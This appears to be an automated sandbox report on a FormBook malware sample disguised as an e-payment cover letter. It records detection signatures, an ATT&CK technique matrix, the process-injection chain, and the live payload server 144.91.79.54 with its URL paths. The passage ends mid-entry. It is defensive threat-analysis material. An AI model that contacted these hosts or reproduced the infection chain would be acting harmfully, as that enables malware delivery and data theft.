          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information211
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		211
          Scripting          		311
          Process Injection          		1
          Masquerading          		OS Credential Dumping21
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		31
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)Logon Script (Windows)311
          Process Injection          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture11
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1501321 Sample: 01_COVER_LETTER_-_FOR_E_PAY... Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 51 4 other signatures 2->51 7 wscript.exe 1 2->7         started        10 wscript.exe 36 1 2->10         started        process3 dnsIp4 53 Wscript starts Powershell (via cmd or directly) 7->53 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 7->55 14 powershell.exe 38 7->14         started        17 powershell.exe 43 7->17         started        19 powershell.exe 7->19         started        21 7 other processes 7->21 43 144.91.79.54, 49710, 80 CONTABODE Germany 10->43 41 C:\Users\user\AppData\...\mBUojysElnsNYdM.vbs, ISO-8859 10->41 dropped 57 System process connects to network (likely due to code injection or exploit) 10->57 59 Windows Shell Script Host drops VBS files 10->59 61 Suspicious execution chain found 10->61 file5 signatures6 process7 signatures8 63 Writes to foreign memory regions 14->63 65 Injects a PE file into a foreign processes 14->65 23 wermgr.exe 19 14->23         started        25 conhost.exe 14->25         started        27 AddInProcess32.exe 14->27         started        29 wermgr.exe 3 19 17->29         started        31 conhost.exe 17->31         started        33 AddInProcess32.exe 17->33         started        35 conhost.exe 19->35         started        37 2 other processes 19->37 39 21 other processes 21->39 process9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          01_COVER_LETTER_-_FOR_E_PAYMENT.vbe13%ReversingLabsScript-WScript.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.m0%URL Reputationsafe
          http://144.91.79.54/2508/file140B807A6BN0%Avira URL Cloudsafe
          http://144.91.79.54:80/2508/s0%Avira URL Cloudsafe
          http://144.91.79.54/2508/file53C7849C570%Avira URL Cloudsafe
          http://144.91.79.54/ll0%Avira URL Cloudsafe
          http://144.91.79.54/0%Avira URL Cloudsafe
          http://144.91.79.54/2508/v750%Avira URL Cloudsafe
          http://144.91.79.54/2508/u9icZZB5Fm5owWojnw5Q.txt0%Avira URL Cloudsafe
          http://144.91.79.54/2508/file0%Avira URL Cloudsafe
          http://144.91.79.54/c0%Avira URL Cloudsafe
          http://144.91.79.54/2508/v0%Avira URL Cloudsafe
          http://144.91.79.54/2508/r0%Avira URL Cloudsafe
          http://144.91.79.54/2508/s0%Avira URL Cloudsafe
          http://144.91.79.54:80/2508/fileJb0%Avira URL Cloudsafe
          http://144.91.79.54/2508/stem0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://144.91.79.54/2508/file140B807A6BNwscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/file53C7849C57wscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/llwscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142958351.0000021315A35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142939052.0000021315A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2149023769.0000021315A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157529486.0000021315A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157462766.0000021315A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157545405.0000021315A35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2149037908.0000021315A2F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.mwscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://144.91.79.54/2508/filewscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163830069.0000021315A96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168732062.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166376752.0000021317D42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167359857.0000021315AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163901569.0000021315AAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/cwscript.exe, 00000000.00000003.2142682570.0000021315A72000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/v75wscript.exe, 00000000.00000003.2166395633.00000213179D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/wscript.exe, 00000000.00000003.2142682570.0000021315A72000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/u9icZZB5Fm5owWojnw5Q.txtwscript.exe, 00000000.00000003.2157529486.0000021315A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157462766.0000021315A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157545405.0000021315A35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157481785.0000021315A56000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54:80/2508/swscript.exe, 00000000.00000003.2165581468.0000021315A0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166759289.0000021315A16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166051740.0000021315A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168457150.0000021315A16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167235585.0000021315A16000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/vwscript.exe, 00000000.00000003.2165519546.0000021315958000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2167970238.0000007E5A0F2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166630724.0000021315959000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167561687.0000021315AAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163830069.0000021315A96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.0000021317748000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167359857.0000021315AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163901569.0000021315AAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/stemwscript.exe, 00000000.00000003.2148962279.0000021315A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142780136.0000021315A3E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54:80/2508/fileJbwscript.exe, 00000000.00000003.2163847317.0000021315A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168596475.0000021315A84000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/rwscript.exe, 00000000.00000003.2158218358.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166607159.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158078701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158910701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168732062.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166276434.00000213179D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158858187.000002131774C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://144.91.79.54/2508/swscript.exe, 00000000.00000003.2158218358.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166607159.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158078701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2148962279.0000021315A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158910701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168732062.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142682570.0000021315A72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142780136.0000021315A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166276434.00000213179D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158858187.000002131774C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          144.91.79.54
          		unknownGermany
          		51167CONTABODEtrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1501321
          Start date and time:2024-08-29 18:36:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 23s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:49
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:01_COVER_LETTER_-_FOR_E_PAYMENT.vbe
          Detection:MAL
          Classification:mal100.troj.expl.evad.winVBE@72/83@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 18
          • Number of non-executed functions: 322
          Cookbook Comments:
          • Found application associated with file extension: .vbe
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.182.143.212, 20.189.173.22, 20.189.173.20, 20.42.65.92, 13.89.179.12, 20.189.173.21
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: 01_COVER_LETTER_-_FOR_E_PAYMENT.vbe

          Simulations

          Behavior and APIs

          TimeTypeDescription
          12:36:57API Interceptor10x Sleep call for process: wscript.exe modified
          12:37:05API Interceptor335x Sleep call for process: powershell.exe modified
          12:37:11API Interceptor10x Sleep call for process: wermgr.exe modified
          12:37:23API Interceptor27x Sleep call for process: AddInProcess32.exe modified
          18:37:01Task SchedulerRun new task: mBUojysElnsNYdM path: C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          144.91.79.54DETAILING_INFO_0321.vbeGet hashmaliciousSnake KeyloggerBrowse
          • 144.91.79.54/2508/file
          doc1.exeGet hashmaliciousClipboard Hijacker, Snake KeyloggerBrowse
          • 144.91.79.54/2508/file
          Reservations_00206.vbeGet hashmaliciousAgentTeslaBrowse
          • 144.91.79.54/2108/file

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CONTABODESHIPMENT_DOCMSS24071327.exeGet hashmaliciousGuLoaderBrowse
          • 95.111.243.74
          http://control.frilix.com/grace/fxc/aW5mby5jcmVkaXRldXJlbkBicmVkYS5ubA==Get hashmaliciousHTMLPhisherBrowse
          • 173.212.217.246
          rSHIPMENT_DOCMSS24071327.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 95.111.243.74
          rARKMONEY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 164.68.127.9
          (No subject) (63).emlGet hashmaliciousHTMLPhisherBrowse
          • 167.86.102.97
          DETAILING_INFO_0321.vbeGet hashmaliciousSnake KeyloggerBrowse
          • 144.91.79.54
          doc1.exeGet hashmaliciousClipboard Hijacker, Snake KeyloggerBrowse
          • 144.91.79.54
          Inv-Info98.htmGet hashmaliciousHTMLPhisherBrowse
          • 62.171.141.146
          Zahteva za ponudbo #U2013 Katalog vzorcev.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 95.111.243.74
          AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
          • 161.97.168.245

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_06aa6660-5866-4c52-bf3f-216c35e81dae\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5337181207134615
          Encrypted:false
          SSDEEP:96:T8Fuj6rxYidyRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAcf/VXT5NHBjV:g26mGyR30wAAzuiFaZ24lO8
          MD5:3EEB7318296ACA782195E819189A57A9
          SHA1:76D352655AC6842C92806E6EDCDE08D3D056D47D
          SHA-256:3397338ACB67FD01D5A79968C7FA36CD3E24EA8C162D51911D9EC3A19CF5E24A
          SHA-512:0233D7349276719C56B9917D3FA1FAA4DEEE5E7804BB3B253D4257B72E47B2A3FA5F3A29CBE3F4A6CA73C6019708CC6400B621FABBCC01EB7ACEEFE5C8C5AA7A
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.4.8.3.9.6.4.1.4.2.0.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.2.6.2.9.3.1.9.7.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.a.a.6.6.6.0.-.5.8.6.6.-.4.c.5.2.-.b.f.3.f.-.2.1.6.c.3.5.e.8.1.d.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.5.-.1.8.9.d.-.7.0.3.8.3.2.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_1875bc6f-2351-4caa-af07-ddd8ff64dfac\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5341053802417658
          Encrypted:false
          SSDEEP:96:o8FAjZrxYidNRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTA4f/VXT5NHBjV:p0ZmGNR30wAAzuiFuZ24lO8
          MD5:6ABE9DD4648083DB8D12D38392412A53
          SHA1:4BEA2A8BC08A493CC4E3D9C73EC0C73FBDC0A550
          SHA-256:85CD5B67884D9761F5626D9ED2DC05188EE21D176746DF81A25A7362CE1861DC
          SHA-512:AC1C00910AEB593D60E061617E10029833B0539EC4A2E01943AC66908BBEC252DBDB38E9EB4446C7A7194368161F4C3F201FB4B9430F017C5DDB7E7390E0EF50
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.2.3.2.7.9.2.7.8.9.9.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.0.2.8.7.6.3.0.6.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.7.5.b.c.6.f.-.2.3.5.1.-.4.c.a.a.-.a.f.0.7.-.d.d.d.8.f.f.6.4.d.f.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.4.8.-.0.0.0.1.-.0.0.1.5.-.f.2.3.e.-.e.3.a.c.3.1.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_1ad3a57e-4e53-4856-86c7-07816daa8d4b\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5341921391902096
          Encrypted:false
          SSDEEP:96:WDFbjKrxYid6cRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTA4f/VXT5NHBx:IFKmG6cR30wAAzuiFuZ24lO8
          MD5:BBB9ED0D70371C093C7FED2C602E41C9
          SHA1:C7D630463E7FEAA13DC676FC18F706F621714814
          SHA-256:940CFEA47767D5C2EED16D64B136CFAE19E38BC5EC318D4DD017C11737C4572B
          SHA-512:89635E2CAA618E8AD78E2FA937CF51093EDD74640182DD6AE89CC555F4FE2089596B8FA090773D094EFD95242EA6D889E5E5D4F1CF42DE7E3FB085797F0BC3FA
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.2.7.8.3.3.2.8.3.8.2.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.1.0.3.8.6.7.8.4.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.d.3.a.5.7.e.-.4.e.5.3.-.4.8.5.6.-.8.6.c.7.-.0.7.8.1.6.d.a.a.8.d.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.c.4.-.0.0.0.1.-.0.0.1.5.-.b.c.9.6.-.5.8.d.b.3.1.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_41c328ab-7460-4040-a823-a0f0b8c30a45\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
